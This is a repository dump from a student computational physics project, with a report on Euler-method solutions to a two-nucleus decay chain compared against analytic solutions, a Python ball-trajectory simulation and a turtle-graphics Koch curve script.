[StackEdit](https://stackedit.io/).\n\n\n\n\n# 
Chapter_one_problem1.4\n------------------------------------------\n\n\n## Problem1.4(链式反应)\n\n--------------------\nA and B are two type of nucleus. Suppose that A decay and form B,which then also decay.Use Euler method to solve the coupled equations\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$&space;\\frac{dN_A}{dt}=-\\frac{N_A}{\\tau_A}$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$&space;\\frac{dN_A}{dt}=-\\frac{N_A}{\\tau_A}$$\" title=\"$$ \\frac{dN_A}{dt}=-\\frac{N_A}{\\tau_A}$$\" /></a>\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{dN_B}{dt}=\\frac{N_A}{\\tau_A}-\\frac{N_B}{\\tau_B}$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{dN_B}{dt}=\\frac{N_A}{\\tau_A}-\\frac{N_B}{\\tau_B}$$\" title=\"$$\\frac{dN_B}{dt}=\\frac{N_A}{\\tau_A}-\\frac{N_B}{\\tau_B}$$\" /></a>\n\nN<sub>A</sub>(t) and N<sub>B</sub>(t) are the populations.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$\\tau_A$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$\\tau_A$\" title=\"$\\tau_A$\" /></a>and<a href=\"http://www.codecogs.com/eqnedit.php?latex=$\\tau_B$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$\\tau_B$\" title=\"$\\tau_B$\" /></a>are the decay time constant.\nCompare numerical results to analytic solutions.\nExplore the behavior according to different values of the ratio$\\frac{\\tau_A}{\\tau_B}$.In particular, try to interpret the short and long time behaviors for different values of this ratio.\n## 计算方法\n-------------------------\n\n输入各个常数,利用loop把利用Euler方法算出的值计入A,B list中,用matplotlib画图比较。 \n[code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch1_1.4.py)\n\n## 结果分析\n------------------------------\n解析解为\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$N_A=N_{A0}e^-\\frac{t}{\\tau_A}$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$N_A=N_{A0}e^-\\frac{t}{\\tau_A}$$\" title=\"$$N_A=N_{A0}e^-\\frac{t}{\\tau_A}$$\" /></a>\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$N_B=N_{A0}\\frac{\\tau_B}{\\tau_A-\\tau_B}(e^-\\frac{t}{\\tau_A}-e^-\\frac{t}{\\tau_B})&plus;N_{B0}$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$N_B=N_{A0}\\frac{\\tau_B}{\\tau_A-\\tau_B}(e^-\\frac{t}{\\tau_A}-e^-\\frac{t}{\\tau_B})&plus;N_{B0}$$\" title=\"$$N_B=N_{A0}\\frac{\\tau_B}{\\tau_A-\\tau_B}(e^-\\frac{t}{\\tau_A}-e^-\\frac{t}{\\tau_B})+N_{B0}$$\" /></a>\n\n------------------------------------------------\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=T=100,dt=1,$N_{A0}=20$,$N_{B0}=0$:\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?T=100,dt=1,$N_{A0}=20$,$N_{B0}=0$:\" title=\"T=100,dt=1,$N_{A0}=20$,$N_{B0}=0$:\" /></a>\n\n\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Figure_1.png)\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=T=100,dt=0.1,$N_{A0}=20$,$N_{B0}=0$:\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?T=100,dt=0.1,$N_{A0}=20$,$N_{B0}=0$:\" title=\"T=100,dt=0.1,$N_{A0}=20$,$N_{B0}=0$:\" />\n</a>\n\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/fig2.png)\n结论1:dt适当变小数值解与解析解更接近\n-------------------------------------------\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=10$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" target=\"_blank\"><img 
src=\"http://latex.codecogs.com/gif.latex?T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=10$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" title=\"T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=10$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" /></a>\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/fig4.png)\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=0$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=0$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" title=\"T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=0$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" /></a>\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/fig3.png)\n\n结论2:\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$\\tau_A$/$\\tau_B$>>1\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$\\tau_A$/$\\tau_B$>>1\" title=\"$\\tau_A$/$\\tau_B$>>1\" /></a>时,B先增多后减少,随时间增大\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$\\tau_A$/$\\tau_B$<<1\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$\\tau_A$/$\\tau_B$<<1\" title=\"$\\tau_A$/$\\tau_B$<<1\" /></a>时,A迅速减少,B迅速增加再逐渐衰变减少\n" }, { "alpha_fraction": 0.46236559748649597, "alphanum_fraction": 0.5199692845344543, "avg_line_length": 23.129629135131836, "blob_id": "de6587e24e614a9e277ca95f33a03eadff2d1ad4", "content_id": "dd5fea44733c8d76dbcd61fd066b1d28f31785d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1302, "license_type": "no_license", "max_line_length": 115, "num_lines": 54, "path": "/ch3.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport math\ng=9.8\ndef Trajectory(v,w,theta):\n velocity_x=[v]\n velocity_y=[0]\n velocity_z=[0]\n dt=0.01\n x=[0]\n y=[10]\n z=[0] \n i=0\n y_dt=1\n while y_dt>0 :\n theta=theta+w*dt\n F_lateral=0.5*g*(math.sin(4*theta)-0.25*math.sin(8*theta)+0.08*math.sin(12*theta)-0.025*math.sin(16*theta))\n vxi=velocity_x[i]\n vyi=velocity_y[i]\n vzi=velocity_z[i] \n v=math.sqrt(vxi**2+vyi**2+vzi**2)\n B=0.0039+0.0058/(1+math.exp((v-35)/5))\n vx_dt=vxi-B*v*vxi*dt+F_lateral*math.sin(theta)\n vy_dt=vyi-B*v*vyi*dt-g*dt\n vz_dt=vzi-B*v*vzi*dt+F_lateral*math.cos(theta)-4.1*10**(-4)*vxi*w\n x_dt=x[i]+vxi*dt\n y_dt=y[i]+vyi*dt\n z_dt=z[i]+vzi*dt\n if y_dt<0:\n r=-y[-1]/y_dt\n x_dt=(x[-1]+r*x_dt)/(r+1)\n y_dt=0\n range=x_dt\n x.append(x_dt)\n y.append(y_dt)\n z.append(z_dt)\n velocity_x.append(vx_dt)\n velocity_y.append(vy_dt)\n velocity_z.append(vz_dt)\n i=i+1\n return x,y,z,range\n\n\n\n\n\nplt.xlabel('x/m')\nplt.ylabel('y/m')\nfor i in range(11):\n t=Trajectory(5*i,math.pi/3,math.pi/2)\n plt.plot(t[0],t[1],label=5*i)\n#plt.xlim(0,180)\nplt.title('x-y,v=50m/s,w=pi/3')\nplt.legend()\nplt.show()" }, { "alpha_fraction": 0.5163853168487549, "alphanum_fraction": 0.7090367674827576, "avg_line_length": 34.96428680419922, "blob_id": "b450b411087795962a088f0412dd85f70dbb2ddd", "content_id": "2d399099d7d8ef5f27efa1465414b57070245459", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1047, "license_type": "no_license", "max_line_length": 118, "num_lines": 28, "path": "/a simple one.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "Different levels of Koch curve can be obtained by this 
code\n```import turtle as t\ndef koch(level, size):\n if level == 0:\n t.forward(size)\n return\n else:\n for angle in [60, -120, 60, 0]:\n koch(level-1, size/3)\n t.left(angle)\n\nt.hideturtle()\nt.up()\nt.setx(-t.window_width()/2)\nt.down()\nt.speed(0)\n\nkoch(5,t.window_width())\n\nt.exitonclick() \n```\n\nset level= 1,2,3,4,5\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/屏幕快照%202017-12-31%2016.54.53.png)\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/屏幕快照%202017-12-31%2016.55.12.png)\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/屏幕快照%202017-12-31%2016.55.29.png)\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/屏幕快照%202017-12-31%2016.56.19.png)\n![5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/屏幕快照%202017-12-31%2016.57.24.png)\n" } ]
33
NeilZP/Flask-UI5
https://github.com/NeilZP/Flask-UI5
ca9e078bc32824e0ef0b21dae2f70ea50e3a72fc
dfced03405c93ae09316a3b60d078f7d0802510d
9f21da73265e0aa6063e0156c34c03dddf155028
refs/heads/master
2021-01-22T07:27:38.729411
2017-02-13T15:25:52
2017-02-13T15:25:52
81,823,897
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5476550459861755, "alphanum_fraction": 0.5673222541809082, "avg_line_length": 28.909090042114258, "blob_id": "ba5e0467d24c0a18d9e0698db765022408bf49ea", "content_id": "6c9de936cb99f19d049dbe4c4e4992c48e356b14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 661, "license_type": "no_license", "max_line_length": 56, "num_lines": 22, "path": "/hello-flask.py", "repo_name": "NeilZP/Flask-UI5", "src_encoding": "UTF-8", "text": "from flask import Flask,render_template,jsonify\napp= Flask(__name__)\n# @app.route('/')\[email protected]('/hello/') \[email protected]('/hello/<name>') \ndef hello(name=None):\n\t# Test1 Begin\n # response = \"<html>\\n\"\n # response += \"<title>Flask Test</title>\\n\"\n # response += \"<body>\\n\"\n # response += \"<h2>Hello World\\n</h2>\"\n # response += \"</body>\\n\"\n # response += \"</html>\\n\"\n # return response\n # Test1 End\n # return render_template(\"hello.html\") #Test 2\n if name == None: \n name = \"Neilzp_20170213\" \n templateDate = {'name' : name}; \n return render_template(\"hello.html\", **templateDate)\n\nif __name__ == '__main__': \n\n" } ]
1
MD2Korg/Cerebral-Cortex-Data-Analysis-Tools
https://github.com/MD2Korg/Cerebral-Cortex-Data-Analysis-Tools
fd9b64a5ce3b63a66ae876b4dd00f0d3ed0f7e15
26813a63ceac645ab9f240bb1ec7aad4c847690a
a98a23fa4d12e8bc4cd7778d94b98f3eced35bc3
refs/heads/master
2021-01-22T19:42:44.923684
2018-07-27T18:58:18
2018-07-27T18:58:18
85,234,626
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6608761548995972, "alphanum_fraction": 0.6674848794937134, "avg_line_length": 32.9487190246582, "blob_id": "c7c27da46fde35a7fa6e549386b7c0350935cd68", "content_id": "e6e6b4d754aa4463465219469fcf85e506b34c96", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5296, "license_type": "permissive", "max_line_length": 225, "num_lines": 156, "path": "/python/cluster/participantDataDump.py", "repo_name": "MD2Korg/Cerebral-Cortex-Data-Analysis-Tools", "src_encoding": "UTF-8", "text": "import argparse\nimport bz2\nimport csv\nimport datetime\nimport json\nimport multiprocessing\nimport os\n\nimport psycopg2\nfrom cassandra.cluster import Cluster\nfrom joblib import Parallel, delayed\n\nparser = argparse.ArgumentParser(description='Export datastreams from the Cerebral Cortex Cassandra store.')\n\nparser.add_argument('--server', help='Cassandra server to connect with', required=True)\nparser.add_argument('--keyspace', help='Cassandra keyspace', required=True)\nparser.add_argument('--path', help='Base filesystem path', required=True)\nparser.add_argument('--participant', help='Participant UUID', required=True)\nparser.add_argument('--startday', help='Day string representing the first day to begin scanning for data',\n required=True)\nparser.add_argument('--endday', help='Day string representing the day to end scanning for data', required=True)\n\nargs = parser.parse_args()\n\n# Setup Variables\nfilepath = args.path\n\nstartday = args.startday\nendday = args.endday\n\nstartyear = int(startday[:4])\nstartmonth = int(startday[4:6])\nstartday = int(startday[6:])\n\nendyear = int(endday[:4])\nendmonth = int(endday[4:6])\nendday = int(endday[6:])\n\nstartdate = datetime.date(startyear, startmonth, startday)\nenddate = datetime.date(endyear, endmonth, endday)\n\nepoch = datetime.datetime.utcfromtimestamp(0)\n\n\ndef getDatastreamIDs(identifier):\n conn = psycopg2.connect(\"dbname=\" + args.keyspace + \" user=cerebralcortex\")\n cur = conn.cursor()\n\n searchStmt = 'select datastreams.id, datastreams.participant_id, datasources.identifier, datasources.datasourcetype, m_cerebrum_applications.identifier, m_cerebrum_platforms.identifier, m_cerebrum_platforms.platformtype '\n searchStmt += 'from datastreams inner join datasources on datasources.id=datastreams.datasource_id '\n searchStmt += 'inner join m_cerebrum_applications on m_cerebrum_applications.id=datasources.m_cerebrum_application_id '\n searchStmt += 'inner join m_cerebrum_platforms on m_cerebrum_platforms.id=datasources.m_cerebrum_platform_id '\n searchStmt += 'where datastreams.participant_id=\\'' + args.participant + '\\''\n\n datastreams = []\n cur.execute(searchStmt)\n results = cur.fetchall()\n for i in results:\n datastreams.append(i)\n\n cur.close()\n conn.close()\n\n return datastreams\n\n\ndef daterange(start_date, end_date):\n for n in range(int((end_date - start_date).days)):\n yield start_date + datetime.timedelta(n)\n\n\ndef flatten(structure, key=\"\", path=\"\", flattened=None):\n if flattened is None:\n flattened = {}\n if type(structure) not in (dict, list):\n flattened[((path + \"_\") if path else \"\") + key] = structure\n elif isinstance(structure, list):\n for i, item in enumerate(structure):\n flatten(item, \"%d\" % i, \"_\".join(filter(None, [path, key])), flattened)\n else:\n for new_key, value in structure.items():\n flatten(value, new_key, \"_\".join(filter(None, [path, key])), flattened)\n return flattened\n\n\ndef 
unix_time_millis(dt):\n return (dt - epoch).total_seconds() * 1000.0\n\n\ndef rowProcessor(r):\n row = []\n row.append(int(unix_time_millis(r.datetime)))\n # row.append(r.datetime)\n row.append(r.offset)\n\n json_parsed = json.loads(r.sample)\n for j in json_parsed:\n val = ''\n if type(j) is dict:\n val = json.dumps(j).encode('utf8')\n else:\n val = j\n row.append(val)\n\n return row\n\n\ndef extractDataStream(datastream):\n segment_char = '+'\n\n dsid = str(datastream[0])\n participantid = str(datastream[1])\n datasource_id = str(datastream[2])\n datasource_type = str(datastream[3])\n app_id = str(datastream[4])\n platform_id = str(datastream[5])\n platform_type = str(datastream[6])\n\n cluster = Cluster([args.server])\n\n session = cluster.connect(args.keyspace)\n\n if not os.path.exists(filepath + '/' + participantid):\n os.mkdir(filepath + '/' + participantid)\n\n filename_base = filepath + '/' + participantid + '/' + participantid + segment_char + dsid + segment_char + app_id + segment_char + datasource_type\n if datastream[2] is not None:\n filename_base += segment_char + datasource_id\n if datastream[6] is not None:\n filename_base += segment_char + platform_type\n if datastream[5] is not None:\n filename_base += segment_char + platform_id\n\n with bz2.BZ2File(filename_base + '.csv.bz2', 'w') as csvfile:\n outputwriter = csv.writer(csvfile, delimiter=',', quotechar=\"'\")\n for day in daterange(startdate, enddate):\n yyyymmdd = day.strftime('%Y%m%d')\n\n stmt = 'SELECT datetime, offset, sample FROM rawdata where datastream_id=' + dsid + ' and day=\\'' + yyyymmdd + '\\''\n rows = session.execute(stmt, timeout=180.0)\n flag = False\n for r in rows:\n flag = True\n outputwriter.writerow(rowProcessor(r))\n\n if flag:\n print('COMPLETED: ' + stmt)\n\n return True\n\n\nif __name__ == \"__main__\":\n num_cores = multiprocessing.cpu_count()\n datastreams = getDatastreamIDs(args.participant)\n results = Parallel(n_jobs=num_cores)(delayed(extractDataStream)(i) for i in datastreams)\n print(\"Complete: \" + str(len(results)) + \" datastreams exported\")\n" }, { "alpha_fraction": 0.7827585935592651, "alphanum_fraction": 0.7965517044067383, "avg_line_length": 47.5, "blob_id": "e16ce72ef92f72a68a342b672c7325e751603068", "content_id": "e6fa14b6a3ca73ec3c65782b7f0b7acc2c420169", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 290, "license_type": "permissive", "max_line_length": 120, "num_lines": 6, "path": "/python/README.md", "repo_name": "MD2Korg/Cerebral-Cortex-Data-Analysis-Tools", "src_encoding": "UTF-8", "text": "# Python Tools\n\n1. **temporalplot.py**: Renders export from the participantDataDump tool based on participant UUID and an optional time \nrange\n1. 
**participantDataDump.py**: Responsible for extracting all datastreams from Cerebral Cortex(0.1.x) and saving them \nas bzip compressed CSV files" }, { "alpha_fraction": 0.5162271857261658, "alphanum_fraction": 0.5309330821037292, "avg_line_length": 30.30158805847168, "blob_id": "a4ff13ac63c4a825a04643648518edff95641988", "content_id": "e4496fc3cce6ef55f1b235df14ffa4351e3e212e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1972, "license_type": "permissive", "max_line_length": 97, "num_lines": 63, "path": "/python/influx-insert.py", "repo_name": "MD2Korg/Cerebral-Cortex-Data-Analysis-Tools", "src_encoding": "UTF-8", "text": "from influxdb import InfluxDBClient\nimport glob\nimport os\nimport bz2\nfrom pprint import pprint\nimport multiprocessing\nfrom joblib import Parallel, delayed\nimport sys\n\ndb = 'rice'\n\ndef parseFile(f):\n client = InfluxDBClient('localhost', 8086, '', '', db)\n client.create_database(db)\n data = []\n basename = os.path.basename(f)[:-8]\n uuid, ds_id, app, identifier = basename.split('+', 3)\n print(uuid, app)\n print(identifier)\n try:\n with bz2.open(f, 'rt') as input_file:\n for l in input_file:\n ts, offset, values = l.rstrip().split(',', 2)\n ts = int(ts)*1000000\n\n data_values = values.split(',')\n object = {}\n object['measurement'] = identifier\n object['tags'] = {'owner': uuid, 'application': app}\n object['time'] = ts\n try:\n sample = map(float,data_values)\n object['fields'] = {}\n for i, s in enumerate(sample):\n object['fields']['value_'+str(i)] = s\n except :\n object['fields'] = {'value': values}\n\n data.append(object)\n if len(data) >= 1000000:\n print('Yielding:', uuid, len(data), identifier)\n client.write_points(data)\n data = []\n\n\n except ValueError as e:\n print(\"Value Error: \", e, basename)\n client.write_points(data)\n return True\n\n\nif __name__=='__main__':\n num_cores = multiprocessing.cpu_count()\n files = glob.glob(db + '/' + sys.argv[1] + '*/*.bz2')\n\n\n sizes = [ (filename, os.stat(filename).st_size) for filename in files ]\n sizes.sort(key=lambda tup: tup[1])\n\n #for f in files:\n # parseFile(f)\n results = Parallel(n_jobs=num_cores-4, verbose=11)(delayed(parseFile)(f) for f,size in sizes)\n print(\"Complete: \" + str(len(results)) + \" datastreams exported\")\n" }, { "alpha_fraction": 0.5716360211372375, "alphanum_fraction": 0.5902710556983948, "avg_line_length": 34.93043518066406, "blob_id": "123179e83b54badf375d1bd16c706494d2bff73c", "content_id": "6e37e3bfde1cb2afc3931d550fd6987bae45ecc0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4132, "license_type": "permissive", "max_line_length": 120, "num_lines": 115, "path": "/python/temporalplot.py", "repo_name": "MD2Korg/Cerebral-Cortex-Data-Analysis-Tools", "src_encoding": "UTF-8", "text": "import argparse as argparse\nimport bz2\nimport datetime\nimport glob\nfrom pprint import pprint\n\nimport matplotlib.collections as col\nimport matplotlib.dates as dates\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef process_data(data):\n x = np.array(data)\n delta = np.diff(x)\n i = np.where(delta > 300 * 1000)\n return np.vstack((x[i], x[i] + delta[i])).T\n\n\ndef process(participant, directory, filter_string='', start_day=None, end_day=None):\n offset = 0\n lines = []\n gst = 1e100\n get = 0\n labels = []\n for f in glob.glob(directory + '/' + participant + filter_string + '.bz2'):\n print(f)\n params = 
f[:-16].split('+')[3:]\n labels.append('__'.join(params))\n offset += 1\n with bz2.open(f, 'rt') as csvFile:\n data = []\n for l in csvFile.readlines():\n items = l.split(',')\n ts = int(items[0])\n if start_day is not None and end_day is not None:\n if ts < start_day or end_day < ts:\n continue\n\n data.append(ts)\n\n if ts < gst:\n gst = ts\n if ts > get:\n get = ts\n\n blocks = process_data(data)\n if len(blocks) > 0:\n pprint(blocks)\n for segment in blocks:\n lines.append([(dates.date2num(datetime.datetime.utcfromtimestamp(segment[0] / 1000.0)), offset),\n (\n dates.date2num(datetime.datetime.utcfromtimestamp(segment[1] / 1000.0)), offset)])\n\n return lines, offset, labels, gst, get\n\n\ndef render(lines, offset, labels, st, et):\n lc = col.LineCollection(lines)\n fig, ax = plt.subplots()\n ax.add_collection(lc)\n ax.xaxis.set_major_locator(dates.DayLocator())\n ax.xaxis.set_major_formatter(dates.DateFormatter('%D'))\n ax.xaxis.set_minor_locator(dates.HourLocator(np.arange(6, 25, 6)))\n ax.xaxis.set_minor_formatter(dates.DateFormatter('%H'))\n\n fig.subplots_adjust(left=.25, right=.99, top=.99)\n\n plt.xlim([dates.date2num(datetime.datetime.utcfromtimestamp(st / 1000.0)),\n dates.date2num(datetime.datetime.utcfromtimestamp(et / 1000.0))])\n plt.ylim([0, offset + 1])\n plt.yticks(range(1, offset + 1), labels)\n plt.xticks(rotation=90)\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Export processor for Cerebral Cortex Data Dumps')\n\n parser.add_argument('--data_directory', help='Data Directory', required=True)\n parser.add_argument('--participant', help='Participant UUID', required=True)\n parser.add_argument('--filter', help='Filter String', default='*', required=False)\n parser.add_argument('--start_day', help='Day string representing the first day to begin scanning for data',\n required=False)\n parser.add_argument('--end_day', help='Day string representing the day to end scanning for data', required=False)\n\n args = parser.parse_args()\n\n participant = args.participant\n data_dir = args.data_directory\n filter = args.filter\n\n if args.start_day and args.end_day:\n print('HERE')\n start_day = args.start_day\n end_day = args.end_day\n\n start_year = int(start_day[:4])\n start_month = int(start_day[4:6])\n start_day = int(start_day[6:])\n\n end_year = int(end_day[:4])\n end_month = int(end_day[4:6])\n end_day = int(end_day[6:])\n\n epoch = datetime.datetime.utcfromtimestamp(0)\n start_date = int((datetime.datetime(start_year, start_month, start_day) - epoch).total_seconds() * 1e3)\n end_date = int((datetime.datetime(end_year, end_month, end_day) - epoch).total_seconds() * 1e3)\n\n lines, offset, labels, gst, get = process(participant, data_dir, filter_string=filter, start_day=start_date,\n end_day=end_date)\n else:\n lines, offset, labels, gst, get = process(participant, data_dir, filter_string=filter)\n render(lines, offset, labels, gst, get)\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.7818182110786438, "avg_line_length": 13, "blob_id": "4dff1cf6499360793287e0da826ce1e69035d094", "content_id": "b3891aa012292cd3c04c79fef5f8dea0e83ffddf", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 55, "license_type": "permissive", "max_line_length": 23, "num_lines": 4, "path": "/python/cluster/requirements.txt", "repo_name": "MD2Korg/Cerebral-Cortex-Data-Analysis-Tools", "src_encoding": "UTF-8", "text": 
"cassandra-driver==3.2.1\njoblib\npathlib2\npsycopg2==2.6.2" } ]
5
tech-and-me/speech_recognition
https://github.com/tech-and-me/speech_recognition
7539a0e57de305ebe75e2505a6410599c22b361f
b1a500682e7cafa97322f18b2de4f4e61effde79
a3f69963f067fb5d6e4d51489efe2eae635d5b04
refs/heads/main
2023-01-05T03:09:14.464497
2020-11-08T08:44:20
2020-11-08T08:44:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4765578508377075, "alphanum_fraction": 0.4884273111820221, "avg_line_length": 30.185184478759766, "blob_id": "f526ec532325e497ecd093bd0026184c9e81130b", "content_id": "4766bd9b52ce2fab4b0230d132bdc02149ecb37e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1685, "license_type": "no_license", "max_line_length": 60, "num_lines": 54, "path": "/speech_pygame.py", "repo_name": "tech-and-me/speech_recognition", "src_encoding": "UTF-8", "text": "import pygame\nimport os\nfrom glob import glob\nimport time\nimport speech_recognition as sr\nfrom random import shuffle\n\ngameDisplay = pygame.display.set_mode((400, 400))\n\npngs = [x for x in glob(\"animals\\\\*.PNG\")]\nnames = [x.split(\".\")[0] for x in glob(\"animals\\\\*.PNG\")]\n\nanimals = {k:v for k, v in zip(pngs, names)}\nprint(animals)\n\n\nprint(pngs)\nprint(names)\nfor n, animals in enumerate(pngs):\n guess_counter = 0\n carImg = pygame.image.load(os.path.join('', animals))\n gameDisplay.blit(carImg,(130,0))\n pygame.display.update()\n # pygame.mixer.Sound.play(Tiger)\n # pygame.mixer.music.stop()\n # time.sleep(1)\n for j in range(1,4):\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print ('What\\'s his name!')\n audio = r.listen(source)\n try:\n text = r.recognize_google(audio)\n print(text)\n except:\n print('Did not get that try Again')\n text=''\n if text == names[n].split(\"\\\\\")[1]:\n print('good job\\n=========\\n\\n') \n #pygame.mixer.Sound.play(right)\n # pygame.mixer.music.stop()\n break\n else:\n if guess_counter < 3:\n print('wrong try again')\n # pygame.mixer.Sound.play(wrong)\n # pygame.mixer.music.stop()\n # time.sleep(1)\n guess_counter += 1\n else:\n print(\"\\nSorry no more chances\\n\\n\")\n time.sleep(1)\n\npygame.quit()\n\n" } ]
1
morgatron/spcpt-analysis
https://github.com/morgatron/spcpt-analysis
b3405d9ab05de45371ae2f436269996a5b0e4af6
432708cf2b6104fb6fa2e9eb83aff3033db4ff01
0705ac9a8272929a7aa68878b87b6c2cf48e7c05
refs/heads/master
2016-09-03T07:30:56.797985
2015-01-31T18:32:59
2015-01-31T18:32:59
30,121,467
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6538461446762085, "alphanum_fraction": 0.7596153616905212, "avg_line_length": 51, "blob_id": "d0e41c18b33bd29c1136799385a17af7775aa5e6", "content_id": "1897158892cee7324f74df55e14440462c96e05e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 208, "license_type": "no_license", "max_line_length": 186, "num_lines": 4, "path": "/html/search/variables_5.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['labsetdata',['LabSetData',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html#a98ebdcd3ceb3fa1b7bc74e8caf64b50d',1,'repo::programs::pythonpackages::pr::SPfuncs']]]\n];\n" }, { "alpha_fraction": 0.4838709533214569, "alphanum_fraction": 0.6881720423698425, "avg_line_length": 22.5, "blob_id": "262afe90f854bcba92c3d7a0ee76182add2226a6", "content_id": "c179abc46fe2d2d67d02f2850fc2be472d5e669f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 93, "license_type": "no_license", "max_line_length": 72, "num_lines": 4, "path": "/html/scrap_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var scrap_8py =\n[\n [ \"test\", \"scrap_8py.html#aceae244c0ee91c8c30885ebb02f12c7e\", null ]\n];" }, { "alpha_fraction": 0.6266666650772095, "alphanum_fraction": 0.6266666650772095, "avg_line_length": 18, "blob_id": "5ae6b6fd4baa231316e66137beff7847deac8759", "content_id": "7345363a98ceac07c70d4b130d72f317d3928181", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 75, "license_type": "no_license", "max_line_length": 53, "num_lines": 4, "path": "/html/namespaces.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var namespaces =\n[\n [ \"repo\", \"namespacerepo.html\", \"namespacerepo\" ]\n];" }, { "alpha_fraction": 0.5495250821113586, "alphanum_fraction": 0.5807327032089233, "avg_line_length": 48.20000076293945, "blob_id": "eb8ccee97732106dce9492f59dff1a959855cda3", "content_id": "7f191a99181cda3747c6a3529cb74f99ce7721f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 737, "license_type": "no_license", "max_line_length": 72, "num_lines": 15, "path": "/html/files.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var files =\n[\n [ \"__init__.py\", \"____init_____8py.html\", null ],\n [ \"convert.py\", \"convert_8py.html\", \"convert_8py\" ],\n [ \"getSPdata.py\", \"getSPdata_8py.html\", \"getSPdata_8py\" ],\n [ \"loadSPFiles.py\", \"loadSPFiles_8py.html\", \"loadSPFiles_8py\" ],\n [ \"openCPT.py\", \"openCPT_8py.html\", \"openCPT_8py\" ],\n [ \"openMotor.py\", \"openMotor_8py.html\", \"openMotor_8py\" ],\n [ \"scrap.py\", \"scrap_8py.html\", \"scrap_8py\" ],\n [ \"sdtime.py\", \"sdtime_8py.html\", \"sdtime_8py\" ],\n [ \"SPDataSet.py\", \"SPDataSet_8py.html\", \"SPDataSet_8py\" ],\n [ \"SPfuncs.py\", \"SPfuncs_8py.html\", 